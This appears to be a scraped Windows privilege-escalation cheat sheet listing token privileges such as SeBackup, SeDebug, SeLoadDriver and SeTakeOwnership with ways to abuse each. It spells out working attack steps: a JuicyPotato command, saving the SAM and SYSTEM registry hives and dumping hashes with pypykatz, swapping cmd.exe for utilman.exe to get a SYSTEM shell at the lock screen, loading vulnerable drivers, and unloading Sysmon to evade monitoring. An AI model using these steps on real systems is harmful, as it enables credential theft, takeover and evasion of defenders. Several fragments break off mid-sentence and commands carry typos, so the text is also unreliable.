PRIVILEGES INFORMATION
Last updated
Last updated
SeAssignPrimaryToken
Admin
3rd party tool
"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"
SeBackup
Threat
Built-in commands
Read sensitve files with robocopy /b
- May be more interesting if you can read %WINDIR%\MEMORY.DMP
- SeBackupPrivilege
(and robocopy) is not helpful when it comes to open files.
- Robocopy requires both SeBackup and SeRestore to work with /b parameter.
SeCreateToken
Admin
3rd party tool
Create arbitrary token including local admin rights with NtCreateToken
.
SeDebug
Admin
PowerShell
Duplicate the lsass.exe
token.
SeLoadDriver
Admin
3rd party tool
1. Load buggy kernel driver such as szkg64.sys
or capcom.sys
2. Exploit the driver vulnerability
Alternatively, the privilege may be used to unload security-related drivers with ftlMC
builtin command. i.e.: fltMC sysmondrv
SeRestore
Admin
PowerShell
Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
SeTakeOwnership
Admin
Built-in commands
1. takeown.exe /f "%windir%\system32"
2. icalcs.exe "%windir%\system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege.
SeTcb
Admin
3rd party tool
Manipulate tokens to have local admin rights included. May require SeImpersonate. To be verified.
Exploitation Of Each Privilege Mention Above =>
Get on the victim machine And get a for potatoes.
Command to execute a script through a privileged user.
.\JuicyPotato.exe -t * -p
c:\path\to\executable.bat
-l 9002 -c '{
CLSID
}'
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
Download The Files And use pyptkatz to dump hashes
pypykatz registry --sam sam system
Thank you for the update. I will try to re-phrase it to something more recipe-like soon.
Script to be found at
1. The szkg64
vulnerability is listed as
2. The szkg64
was created by
1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with ). 3. Rename utilman.exe to utilman.old 4. Rename cmd.exe to utilman.exe 5. Lock the console and press Win+U